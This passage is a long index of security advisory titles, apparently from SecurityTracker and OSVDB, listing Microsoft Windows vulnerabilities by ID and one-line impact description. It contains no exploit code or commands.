Named Pipe NULL Session Bugs in svcctl and eventlog RPC Interfaces Disclose Information to Remote Users [1014198] Microsoft Windows Buffer Overflow in Processing Server Message Block Packets Lets Remote Users Execute Arbitrary Code [1014196] Microsoft Windows Buffer Overflow in Web Client Service Lets Remote Authenticated Users Execute Arbitrary Code [1013761] Microsoft Windows Explorer 'webvw.dll' Input Validation Error Lets Remote Users Execute Arbitrary Scripting Code [1013689] Microsoft Windows Shell MSHTA Lets Remote Users Code Execute Arbitrary Scripting Code [1013688] Microsoft Windows Kernel and Font Buffer Overflows Let Local Users Deny Service or Obtain System Privileges [1013686] Microsoft Windows TCP, IP, and ICMP Processing Errors Let Remote Users Deny Service and Execute Arbitrary Code [1013552] Microsoft Windows Remote Desktop 'TSShutdn.exe' Lets Remote Authenticated Users Shutdown the System [1013284] Microsoft Windows 2000 and XP Group Policy Can Be Bypassed By Microsoft Office Applications and By Flash Drives [1013120] Microsoft Windows OLE Buffer Overflow Lets Remote Users Execute Arbitrary Code and COM Access Flaw Lets Remote Authenticated Users Gain Elevated Privileges [1013119] Microsoft Windows Hyperlink Object Library Lets Remote Users Execute Arbitrary Code [1013117] Microsoft Windows License Logging Service Lets Remote Users Execute Arbitrary Code [1013115] Microsoft Windows Media Player Buffer Overflow in Processing PNG Files Lets Remote Users Execute Arbitrary Code [1013114] Microsoft Windows SMB Lets Remote Users Execute Arbitrary Code [1013112] Microsoft Windows XP Named Pipe Validation Error Lets Remote Users Obtain Information [1012891] Microsoft IE Windows XP SP2 File Download Security Can Be Bypassed With Dynamic IFRAME Tag [1012684] Microsoft Windows LoadImage API Buffer Overflow Lets Remote Users Execute Arbitrary Code [1012683] Microsoft Windows ANI File Parsing Errors Let Remote Users Deny Service [1012682] Microsoft Windows Help System Buffer Overflows in Processing Phrase Compressed Help Files Lets Remote Users Execute Arbitrary Code [1012626] Microsoft Windows Media Player setItemInfo Lets Remote Users Execute Arbitrary Code [1012515] Microsoft Windows NT 4.0 Buffer Overflows in the Logging and Processing of DHCP Packets May Let Remote Users Execute Arbitrary Code [1012513] Microsoft Windows Kernel Buffer Overflow in Processing Local Procedure Call Messages Lets Local Users Gain System Privileges [1012458] Microsoft Internet Explorer Lets Remote Users Inject Content into Open Windows [1012435] Microsoft Windows Resource Kit Buffer Overflow and Input Validation Holes in 'w3who.dll' May Permit Remote Code Execution and Cross-Site Scripting Attacks [1011940] Microsoft Remote Desktop on Windows XP Lets Remote Authenticated Users Restart the System [1011880] Microsoft Windows XP Error in Explorer in Processing WAV Files Lets Remote Users Deny Service [1011859] Microsoft Internet Explorer on Windows XP Fails to Restrict Drag and Drop Operations When Configured to Disable These Operations [1011647] Microsoft Windows Shell Buffer Overflows Let Remote Users Execute Arbitrary Code [1011637] Microsoft Windows Buffer Overflow in Processing Compressed Folders Lets Remote Users Execute Arbitrary Code [1010996] Microsoft Windows XP SP2 Local Computer Scripting Restrictions Can Be Bypassed With a Specially Crafted MHT File [1010959] Microsoft Windows Explorer (in XP SP2) May Fail to Warn Users When Executing Untrusted Files [1010688] Microsoft Windows Task Scheduler Buffer Overflow Lets Remote Users Execute Arbitrary Code [1010687] Microsoft Windows 2000/NT POSIX Subsystem Buffer Overflow Lets Local Users Gain Elevated Privileges [1010352] Microsoft Windows 2000 Domains With Eight Characters May Let Remote Users With Expired Passwords Login [1010314] Microsoft Windows IPSec Filtering Can Be Bypassed By Remote Users [1009940] Microsoft Windows Explorer Buffer Overflow in Processing SMB Share Names Lets Remote Users Execute Arbitrary Code [1009776] Microsoft Windows Kernel Local Descriptor Table Flaw Lets Local Users Gain Elevated Privileges [1009771] Microsoft Windows Negotiate Security Software Provider (SSP) Buffer Overflow Lets Remote and Local Users Execute Arbitrary Code [1009770] Microsoft Windows Management Interface Provider Lets Local Users Gain Elevated Privileges [1009767] Microsoft Windows 2000 Domain Controller LDAP Flaw May Let Remote Users Restart the Authentication Service [1009762] Microsoft Windows COM Internet Services and RPC over HTTP Can Be Crashed By Remote Users [1009761] Microsoft Windows COM Object Identifier Creation Flaw May Let Remote Users Cause Applications to Open Network Ports [1009758] Microsoft Windows RCP Memory Leak Lets Remote Users Deny Service [1009673] Microsoft Windows XP 'mswebdvd.dll' Buffer Overflow Lets Remote Users Deny Service [1009359] Microsoft Windows Media Services Can Be Crashed By Remote Users [1009181] Microsoft Windows Explorer Heap Overflow in Processing '.emf' Files Permits Code Execution [1009008] Microsoft Windows Internet Naming Service (WINS) Length Validation Flaw Lets Remote Users Deny Service [1008699] Microsoft Windows Buffer Overflow in MDAC Lets Remote Users Execute Arbitrary Code [1008324] Microsoft Exchange 2003 With Outlook Web Access and Windows SharePoint Services May Grant Incorrect E-mail Account Access to Remote Authenticated Users [1008146] Microsoft Windows Workstation Service (wkssvc.dll) Buffer Overflow Lets Remote Users Execute Arbitrary Code with System Privileges [1007933] Microsoft Windows Messenger Service Buffer Overflow Lets Remote Users Execute Arbitrary Code With Local System Privileges [1007932] Microsoft Windows Troubleshooter ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1007922] Microsoft Windows RPC Multi-threaded Race Condition Lets Remote Users Crash the Service or Execute Arbitrary Code [1007905] Microsoft Windows Server 2003 Shell Folders Can Be Referenced Using Directory Traversal Characters [1007874] Microsoft Windows OS PostThreadMessage() API Permits Local Users to Terminate Processes That Have Message Queues [1007670] Microsoft Windows Remote Procedure Call (RPC) DCOM Activation Buffer Overflows Let Remote Users Execute Arbitrary Code [1007615] Microsoft Windows NetBIOS Name Service May Disclose Memory Contents to Remote Users [1007281] Microsoft Windows NT File Management Flaw May Let Remote Users Crash Certain Applications [1007214] Microsoft Windows XP Shell Buffer Overflow in Processing Folder Display Attributes Permits Remote Code Execution [1007212] Microsoft Windows Remote Procedure Call (RPC) Service Buffer Overflow in Processing DCOM Requests Allows Remote Code Execution [1007152] Microsoft Windows 2000 Accessibility Utility Manager Lets Local Users Gain Elevated Privileges [1007099] Microsoft Windows 2000 ShellExecute() Buffer Overflow May Let Users Execute Arbitrary Code [1007093] Microsoft Active Directory Stack Overflow in 'Lsaas.exe' Lets Remote Users Crash the Windows 2000 Server [1007059] Microsoft Windows Media Services (nsiislog.dll) Extension to Internet Information Server (IIS) Has Another Buffer Overflow That Lets Remote Execute Arbitrary Code [1007057] Microsoft Windows Media Player Access Control Flaw Lets Remote Users View, Modify, and Delete Media Library Metadata [1006959] Microsoft Windows Server 2003 Drivers May Leak Information From Memory Via Ethernet Packets Containing TCP Streams [1006866] Microsoft Windows Media Services (nsiislog.dll) Extension to Internet Information Server (IIS) Lets Remote Execute Arbitrary Code [1006803] Microsoft Windows Can Be Crashed By Remote Users via Malformed NetMeeting URLs [1006588] Microsoft Windows OS Kernel Messaging Buffer Overflow Lets Local Users Gain Full Control of the System [1006580] Microsoft Windows 2003 'win2k.sys' Printing Bug Lets Users Crash the System [1006532] Microsoft Windows VM Input Validation Flaw in ByteCode Verifier Lets Malicious Java Applets Execute Arbitrary Code [1006447] Microsoft Windows Terminal Services RDP Implementation Does Not Validate Server Identity, Allowing Man-in-the-Middle Attacks [1006323] Microsoft Windows Buffer Overflow in Windows Script Engine JScript.DLL Lets Remote Users Execute Arbitrary Code [1006286] Microsoft Windows 2000/XP PostMessage() API Flaw May Let Local Users Grab Passwords from Local Dialog Boxes [1006179] Microsoft Windows Me Help and Support Center URL Handler Overflow Lets Remote Users Execute Arbitrary Code [1006121] Microsoft Windows 'riched20.DLL' Buffer Overflow May Let Remote Users Crash Applications [1006045] Microsoft Windows XP Redirector Buffer Overflow May Let Local Users Gain System Level Privileges [1005986] Microsoft Windows Terminal Server MSGINA.DLL Flaw Lets Remote Authenticated Users Reboot the Server [1005859] Microsoft Windows File Protection Mechanism Weakness in Trusting Code-Signing Certificate Chains Lets Arbitrary Remote Users Sign Code That Will Be Trusted By Windows [1005858] Microsoft Windows File Protection Weakness May Let Local Users Replace Code With Previous Vulnerable Versions Without Detection [1005833] Microsoft Windows XP Shell Buffer Overflow in Processing Audio Files Allows Remote Users to Execute Arbitrary Code [1005799] Microsoft Windows OS Bug in Processing WM_TIMER Messages May Let Local Users Gain Elevated Privileges [1005761] Microsoft Windows XP Wireless LAN Support May Disclose Access Point Information to Remote Users [1005455] Microsoft Windows Remote Procedure Call (RPC) Service Null Pointer Dereference Allows Remote Users to Crash the Service [1005454] Microsoft Windows Media Player for Solaris Uses Unsafe Default Permissions [1005343] Microsoft Windows Help System Bug in Processing Compiled HTML Help Files Lets Remote Users Execute Arbitrary Commands in the Local Computer Security Zone [1005336] Microsoft Windows Operating System Compressed Folders Allow Arbitrary Files to Be Created [1005335] Microsoft Windows Operating System Compressed Folders Allow Arbitrary Code to Be Executed [1005332] Microsoft Windows Help System Buffer Overflow in 'hhctrl.ocx' Lets Remote Users Execute Arbitrary Code [1005256] (Vendor Issues Fix) Microsoft Windows XP Remote Desktop Implementation Bug Lets Remote Users Crash the Operating System [1005242] Microsoft Windows XP Remote Desktop Can Be Crashed By Remote Users Sending a Modified RDP Packet [1005150] Microsoft Windows Operating System Certificate Enrollment ActiveX Control Allows Remote Users to Delete Certificates on a Target User's System [1005108] Microsoft Windows Media Player Allows Malicious Windows Media Download (.wmd) Files to Silently Create Files in a Known Location and Execute Them [1005070] Microsoft Internet Explorer (IE) Browser Error Message Processing Allows Remote Users to Execute Arbitrary Code on Certain Windows 98 Platforms [1005068] Microsoft NTFS Filesystem in Windows NT and Windows 2000 Has Auditing Hole That Lets Local Users Access Files Without the File Access Being Audited [1005063] Microsoft Windows XP Help and Support Center Hole Lets Remote Users Create URLs That, When Loaded, Will Delete Arbitrary Files on Your System [1004441] Microsoft Windows Help System Buffer Overflows in 'htctrl.ocx' ActiveX Control May Let Remote Users Execute Arbitrary Code on a Target User's Computer By Sending Malicious HTML [1004357] Microsoft Windows Debugging Facility for Windows NT4 and 2000 Has Authentication Hole That Lets Local Users Execute Arbitrary Code with SYSTEM Privileges [1004236] L.Y.S.I.A.S. Lidik Web Server for Microsoft Windows Systems Lets Remote Users View Files Located Anywhere on the Partition [1004083] Microsoft Windows 2000 'microsoft-ds' Service Flaw Allows Remote Users to Create Denial of Service Conditions By Sending Malformed Packets [1004022] Microsoft Windows 2000 Group Policy Object Enforcement Can Be Circumvented if User License Limits are Exceeded [1003975] Microsoft Windows NT, 2000, and XP Kernel Buffer Overflow in Processing Multiple UNC Provider (MUP) Requests May Let Local Users Obtain System Level Privileges [1003949] Microsoft Windows 2000 DCOM Implementation Flaw May Disclose Memory Contents to Remote Users [1003816] Microsoft Windows 2000 Automatic Log Off Policy Fails to Expire Sessions in Progress [1003764] Microsoft Windows Operating System Shell URL Handler Bug Lets Remote Users Create HTML That Could Cause Arbitrary Code to Be Executed on Another User's System in Certain Situations [1003687] Microsoft Windows 2000 and Windows XP SMTP Service Command Processing Bug Lets Remote Users Cause the SMTP Service to Crash [1003686] Microsoft Windows SMTP Service Lets Remote Users Send or Relay Unauthorized Mail (including SPAM) Via the Server [1003633] Microsoft XML Core Services in Microsoft Windows XP Operating System Lets Remote Scripts Access and Send Local Files [1003591] Microsoft Windows Terminal Services May Cause the System's Screen Saver Lockout Mechanism to Fail in Certain Situations [1003472] Microsoft Telnet Server for Windows 2000 and for Interix Has a Buffer Overflow That May Let Remote Users Execute Code on the Server with System Level Privileges [1003402] Microsoft Windows NT 4.0 and Windows 2000 Domain Controllers May Give Elevated Privileges to Remote Users Who Are Valid Administrators on Other Trusted Domains [1003369] PGPfire Personal Firewall for Microsoft Windows Discloses Identifying Information to Remote Users [1003310] Microsoft Windows NT/2000 Authentication Lockout Bug May Record Successful Logins as Failed Login Attempts in Certain Situations [1003308] Microsoft Windows XP Manifest Processing Bug Lets Local Users Corrupt the System and Cause the Boot Process to Fail [1003257] Microsoft Windows XP Upgrade Effectively Removes Patches from Internet Explorer (IE) During Upgrade, Leaving Users Exposed to IE Vulnerabilities [1003239] Python Language Implementation on Microsoft Windows Allows a Remote Server to Access Files on a Web Surfing User's PC [1003228] Microsoft Windows Media Player Discloses Unique ID to Remote Users in the Default Configuration, Allowing Web Sites to Track Users [1003221] Microsoft Internet Explorer (IE) Default Configuration Allows HTML-based Scripts to Access Your Windows Clipboard Contents [1003201] Microsoft Windows 95 Backup Utility Has Buffer Overflow That Could Cause Denial of Service Conditions [1003121] Microsoft Windows XP Task Manager Will Not Kill Certain Processes [1003041] Microsoft Windows XP Remote Desktop Client May Disclose Recently Used Account Names to Remote Users [1003028] Microsoft Windows Universal Plug and Play Component Buffer Overflow Gives Remote Users System Level Access to Windows XP and 98/ME Hosts [1003003] Microsoft Windows XP Hot Key Function Lets Physically Local Users Execute Administrator Hot Key Functions in Certain Situations [1002979] Microsoft Windows Explorer Discloses Stored FTP Passwords to Local Users [1002926] Microsoft Windows Operating System File Locking Design May Allow Local Users to Block Group Policy Scripts [1002922] Microsoft Windows 2000 Internet Key Exchange (IKE) Service Can Be Crashed By Remote Users [1002754] Terminal Services on Microsoft Windows 2000 and XP Allow Remote Users to Log Bogus IP Addresses Instead of the User's Genuine Address [1002731] Microsoft Windows 2000 RunAs Service May Disclose Authentication Credentials to Local Users [1002730] Microsoft Windows 2000 RunAs Utility May Disclose Sensitive Information to Local Users [1002729] Microsoft Windows 2000 RunAs Service Allows Local Users to Disable the Service [1002601] Microsoft Windows Me Universal Plug and Play (UPnP) Ssdpsrv.exe Server Component Can Be Crashed by Remote Users [1002519] TYPSoft FTP Server for Microsoft Windows Can Be Crashed by Remote Users [1002418] Counterpane's Password Safe Password Encryption Utility for Microsoft Windows May Disclose Passwords to Local Users in Certain Situations [1002394] Microsoft Windows NT Remote Procedure Call (RPC) Services Can Be Crashed With Malformed Packets [1002201] Microsoft Windows TCP/IP Stack Vulnerable to a Certain Man-in-the-Middle Denial of Service Attack [1002197] Microsoft Windows NNTP Network News Service Has a Memory Leak That Allows Remote Users to Cause the Server to Crash [1002124] Microsoft Windows 98 Operating System Can Be Crashed When Running a Web Server or Other Servers And the AUX Device is Accessed By the Program [1002106] Microsoft Windows 2000 and Windows NT 4.0 RPC Input Validation Failure Lets Remote Users Destabilize the Operating System [1002099] Microsoft Windows 2000 Telnet Service Can Be Crashed By Remote Users [1002098] Windows Terminal Services in Microsoft Windows 2000 and NT 4.0 Can Be Crashed By Remote Users Due to a Memory Leak [1001993] Microsoft Windows 2000, Linux 2.4, NetBSD, FreeBSD, and OpenBSD May Let Remote Users Affect TCP Performance [1001992] Microsoft Windows NT Lets Remote Users Cause Increased Packet Overhead and Increased CPU Resource Consumption [1001931] Microsoft Windows 2000 SMTP Service May Allow Unauthorized Remote Users to Relay E-mail via the Service [1001832] Microsoft Windows 2000 LDAP Server Lets Remote Users Gain Administrator Access to the Domain Controller When Configured to Support LDAP over SSL [1001701] Microsoft Windows 2000 Telnet Server Allows Local Users to Gain System-Level Privileges and Lets Remote Users Crash the Server [1001605] Microsoft Windows 2000 Allows Local Users to Elevate Privileges [1001603] Microsoft Windows Media Player May Allow Remote Users to Execute Code Contained in Internet Shortcuts and View Files on the Media Player's Host [1001587] Microsoft Word for Windows and for Mac May Run Macros Linked By RTF Documents Without Warning [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server [1001565] Microsoft IIS Web Server on Windows 2000 Allows Remote Users to Cause the Server to Consume All Available Memory Due to Memory Leak in WebDAV Lock Method [1001513] Microsoft Windows 2000 Indexing Service Allows Remote Users to View Include Programming Files [1001501] Microsoft Windows 2000 Domain Controllers Can Be Effectively Halted By Remote Users [1001467] Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System [1001464] Microsoft Internet Information Server IIS 5.0 for Windows 2000 Lets Remote Users Execute Arbitrary Code on the Server and Gain Control of the Server [1001360] Microsoft Windows Operating System DLL May Allow Malicious Remote Scripts to Run Code on the User's Host Without the User's Intervention [1001240] Microsoft FTP Client for Windows 2000 Still Vulnerable to Executing Arbitrary Code in Limited Situations [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords [1001110] A Microsoft German-Language Hotfix for Windows NT 4 Incorrectly Displays Some Security Events as Other Security Events OSVDB - http://www.osvdb.org: [86060] Microsoft Windows Kerberos Implementation Session Handling Remote DoS [70835] Microsoft Windows Kerberos Authentication Downgrade Weakness [70834] Microsoft Windows Kerberos Unkeyed Checksum Hashing Mechanism Service Ticket Forgery [62258] Microsoft Windows Kerberos Ticket-Granting-Ticket Renewal Request NULL Dereference Remote DoS [18609] Microsoft Windows Kerberos PKINIT Domain Controller Spoofing [18608] Microsoft Windows Kerberos Crafted Packet Remote DoS [15335] Microsoft Windows Server 2003 MIT Kerberos Realm Authentication Group Policy Failure [4877] Microsoft Windows Terminal Services Kerberos Double Authorization Data Entry [96197] Microsoft Windows TCP/IP Stack Crafted ICMPv6 Packet Handling Remote DoS [96195] Microsoft Windows NAT Driver Crafted ICMP Packet Handling Remote Memory Corruption DoS [96194] Microsoft Windows Asynchronous RPC Request Handling Remote Code Execution [96193] Microsoft Windows Unicode Scripts Processor (USP10.DLL) Uniscribe Font Parsing Engine Unspecified Memory Corruption [96180] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3196) [96179] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3197) [96178] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3198) [95667] Microsoft Windows XP Wireless Preferred Network List (PNL) Remote Disclosure [95589] Microsoft Windows Mobile Wireless Preferred Network List (PNL) Remote Disclosure [94987] Microsoft Windows Defender Improper Pathname Handling Local Privilege Escalation [94986] Microsoft Windows Media Format Runtime Media File Handling Arbitrary Code Execution [94985] Microsoft Windows DirectShow GIF File Handling Memory Overwrite Arbitrary Code Execution [94966] Microsoft Windows win32k.sys Memory Object Dereference Handling Local Privilege Escalation [94965] Microsoft Windows win32k.sys Memory Object Allocation Handling Local Privilege Escalation [94964] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow [94963] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow DoS [94962] Microsoft Windows win32k.sys Memory Object Handling Local Information Disclosure [94961] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation [94126] Microsoft Windows Print Spooler Printer Deletion Memory Handling Local Privilege Escalation [94125] Microsoft Windows TCP/IP Driver TCP Connection Crafted Packet Handling Remote Integer Overflow DoS [94124] Microsoft Windows Kernel Page Fault System Call Handling Local Information Disclosure [93539] Microsoft Windows win32k.sys EPATHOBJ::pprFlattenRec / EPATHOBJ::bFlatten Functions Local Privilege Escalation [93320] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation [93319] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow [93318] Microsoft Windows DirectX Graphics Kernel Subsystem (dxgkrnl.sys) Memory Object Handling Local Privilege Escalation [93317] Microsoft Windows Essentials Windows Writer Crafted URL Handling Arbitrary File Overwrite [93300] Microsoft Windows HTTP Protocol Stack (HTTP.sys) Crafted HTTP Header Handling Infinite Loop Remote DoS [92133] Microsoft Windows NTFS NULL Pointer Dereference Local Privilege Escalation [92132] Microsoft Windows win32k.sys Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1292) [92131] Microsoft Windows win32k.sys Crafted Font File Handling DoS [92130] Microsoft Windows win32k.sys Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1283) [92127] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Unspecified Local Memory Corruption [92126] Microsoft Windows Multiple Active Directory Components LDAP Crafted Query Handling Memory Consumption Remote DoS [92125] Microsoft Windows Kernel Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1294) [92124] Microsoft Windows Kernel Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1284) [92122] Microsoft Windows Remote Desktop Client ActiveX (mstscax.dll) Use-after-free Arbitrary Code Execution [91696] Microsoft Windows Modern Mail Unspecified Spoofing Weakness [91269] Microsoft Windows 8 TrueType Font (TTF) Handling Unspecified DoS [91195] Microsoft Windows 7 Unspecified ASLR Protection Mechanism Bypass [91194] Microsoft Windows 7 Kernel Unspecified Local Privilege Escalation (pwn2own) [91193] Microsoft Windows 7 Unspecified ASLR / DEP Protection Mechanism Bypass (pwn2own) [91157] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1287) [91156] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1286) [91155] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1285) [90257] Microsoft Windows Server 2003 ICACLS.EXE Permission Inheritance Weakness [90236] Microsoft Windows ZwSetInformationProcess() Function Process Priority Handling Local DoS [90166] Microsoft Windows Object Linking and Embedding (OLE) Automation Memory Allocation RTF File Handling Arbitrary Code Execution [90165] Microsoft Windows Win32.sys CSRSS Memory Object Handling Local Privilege Escalation [90164] Microsoft Windows TCP/IP Stack Crafted Connection Termination Packet (TCP PIN WAIT) Handling Remote DoS [90163] Microsoft Windows Memory Object Reference Count Handling Local Privilege Escalation [90162] Microsoft Windows Memory Object Handling Local Privilege Escalation (2013-1279) [90161] Microsoft Windows ApphelpCacheLookupEntry Function Memory Object Handling Local Privilege Escalation [90160] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1277) [90159] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1276) [90158] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1275) [90157] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1274) [90156] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1273) [90155] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1272) [90154] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1271) [90153] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1270) [90152] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1269) [90151] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1268) [90150] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1267) [90149] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1266) [90148] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1265) [90147] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1264) [90146] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1263) [90145] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1262) [90144] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1261) [90143] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1260) [90142] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1259) [90141] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1258) [90140] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1257) [90139] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1256) [90138] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1255) [90137] Microsoft Windows win32k.sys SfnINOUTSTYLECHANGE Function Memory Object Handling Local Privilege Escalation [90136] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1253) [90135] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1252) [90134] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1251) [90133] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1250) [90132] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1249) [90131] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1248) [90130] Microsoft .NET Framework Windows Form Object Creation Callback Function Arbitrary Code Execution [90129] Microsoft Windows NFS Server Read-only Share File Operation Handling Remote DoS [90128] Microsoft Windows Media Content Handling Arbitrary Code Execution [89315] Microsoft Windows TCP/IP Implementation Queue Connection Saturation TCP State Table Remote DoS [89157] Microsoft Windows IPv6 Router Advertisement (RA) Flooding Weakness [88967] Microsoft Windows SSL/TLS Forced Downgrade MitM Weakness [88966] Microsoft Windows win32k.sys Window Broadcast Message Handling Local Privilege Escalation [88963] Microsoft .NET Framework Windows Forms (WinForms) Component System.Drawing.Imaging.EncoderParameters.ConvertToMemory() Method this.param.Length Parameter Multiple Application Handling Heap Buffer Overflow [88956] Microsoft Windows Printer Spooler Service Print Job Handling Memory Corruption [88836] Microsoft Windows Paint BMP Image Parsing Memory Corruption [88575] Microsoft Windows NT NtAcceptConnectPort Spoofed LPC Port Request Arbitrary Process Hijacking Weakness [88320] Microsoft Windows TrueType Font (TTF) Parsing Unspecified Arbitrary Code Execution [88316] Microsoft Windows OpenType Font (OTF) Parsing Unspecified Arbitrary Code Execution [88313] Microsoft Windows KERNEL32.DLL Filename Parsing Memory Corruption Privilege Escalation [88312] Microsoft Windows DirectPlay Office File Handling Heap Overflow [88051] Microsoft Windows Crafted DHCPv6 Message Remote DoS [87269] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2012-2553) [87268] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2012-2530) [87260] Microsoft Windows Briefcase Handling Underflow (2012-1527) [87259] Microsoft Windows Briefcase Handling Underflow (2012-1528) [86905] Microsoft Windows NTFS ANSI API File Name Truncation Weakness [86903] Microsoft Windows NT CSRSS Malformed Console I/O Local DoS [86866] Microsoft Windows Trusted Publisher Certificate Process Injection UAC Protection Bypass [86865] Microsoft Windows UAC Protection User-assisted Circumvention [86839] Microsoft Windows Media Player AVI File Handling Divide-by-Zero DoS [86768] Microsoft Windows Help File Viewer (winhlp32.exe) HLP File Handling Buffer Overflow [86061] Microsoft Windows Server 2008 R1 CSRSS ReadConsole / CloseHandle Local DoS [86058] Microsoft Windows Kernel Unspecified Memory Object Handling Local Overflow [85840] Microsoft Windows lpApplicationName Function Path Subversion Local Privilege Escalation [85749] Microsoft Windows win32k.sys TrueType Font File Handling Buffer Overflow [85619] Microsoft Windows Phone 7 X.509 Certificate Subject's Common Name (CN) Field Domain Name Validation Multiple Protocol SSL Server MitM Spoofing Weakness [85444] Microsoft Windows NT MSIEXEC Registry Modification Local Privilege Escalation [85442] Microsoft Windows NT Predictable LPC Message Identifier Weakness [85418] Microsoft Windows Share Service File Handle Request Saturation Remote DoS [85039] Microsoft Windows NT LPC Zone Exhaustion Local DoS [85038] Microsoft Windows Filename Extension Handling Overflow DoS [84604] Microsoft Windows JScript / VBScript Memory Object Size Calculation Website Handling Memory Corruption [84603] Microsoft Windows win32k.sys Use-after-free Local Privilege Escalation [84602] Microsoft Windows Remote Desktop Services Malformed RDP Packet Parsing Remote Code Execution [84601] Microsoft Windows Remote Administration Protocol Malformed RAP Request Parsing Remote Stack Overflow [84600] Microsoft Windows Remote Administration Protocol Malformed RAP Request Parsing Remote Heap Overflow [84599] Microsoft Windows Print Spooler Service Remote Format String [84598] Microsoft Windows netapi32.dll Remote Administration Protocol Malformed RAP Request Parsing Remote DoS [84593] Microsoft Multiple Product Windows Common Controls TabStrip ActiveX (MSCOMCTL.OCX) Document Handling Arbitrary Code Execution [83796] Microsoft Windows DCOM RPCSS.exe Local Privilege Escalation [83751] Microsoft Windows Terminal Services LCA Issued Certificates Arbitrary Binary Signing Weakness [83750] Microsoft Windows Gadgets Unspecified Remote Code Execution [83660] Microsoft Windows TLS Protocol HTTPS Session Decryption Information Disclosure [83659] Microsoft Windows win32k.sys Keyboard Layout Handling Local Privilege Escalation [83658] Microsoft Windows win32k.sys Hook Procedure Creation Incorrect Type Handling Local Privilege Escalation [83657] Microsoft Windows ADO Cachesize Data Access Components Memory Object Handling Overflow [83656] Microsoft Windows File / Directory Name Handling Remote Code Execution [83453] Microsoft Windows ProfileList Registry Key Permission Weakness User Profile Subversion [83169] Microsoft Windows NT telnetd Service Port Scan Remote DoS [83126] Microsoft Windows NT Registry Plaintext Service Password Local Disclosure [82928] Microsoft Windows atmfd.dll OpenType Font (OTF) File Handling DoS [82858] Microsoft Windows win32k.sys Thread Creation Attempt Handling Race Condition Local Privilege Escalation [82857] Microsoft Windows TrueType Font Loading Font Resource Reference Counter Handling Local Overflow [82856] Microsoft Windows win32k.sys Clipboard Format Atom Name Handling Local Privilege Escalation [82855] Microsoft Windows win32k.sys String Atom Class Name Handling Local Privilege Escalation (2012-1865) [82854] Microsoft Windows win32k.sys String Atom Class Name Handling Local Privilege Escalation (2012-1864) [82851] Microsoft Windows Remote Desktop Protocol (RDP) Memory Object Handling Remote Code Execution [82850] Microsoft Windows User Mode Scheduler Memory Corruption Local Privilege Escalation [82849] Microsoft Windows BIOS Memory Handling ROM Corruption Local Privilege Escalation [82693] Microsoft Windows Terminal Server Licensing Service MD5 Hash Collision Code Signing Spoofing [82605] Microsoft Windows Explorer Crafted Subdirectory Parent Directory Deletion Local DoS [82604] Microsoft Windows Media Player Streamed Broadcast Handling Remote Overflow [82505] Microsoft Windows IE Instances Overflow Group Policy Bypass [82491] Microsoft Windows UTF Character Set File Extension Spoofing Weakness [81736] Microsoft Windows GDI+ EMF File Record Handling Remote Code Execution [81735] Microsoft Windows Partition Manager (partmgr.sys) PnP Configuration Manager Function Call Handling Local Privilege Escalation [81730] Microsoft Windows tcpip.sys Outbound Packet Filtering Windows Firewall Bypass [81729] Microsoft Windows tcpip.sys Double-free IPv6 Address Binding Parsing Local Privilege Escalation [81720] Microsoft Windows t2embed.dll Module TTF File Handling Remote Code Execution [81717] Microsoft Windows win32k.sys Scrollbar Calculation Handling 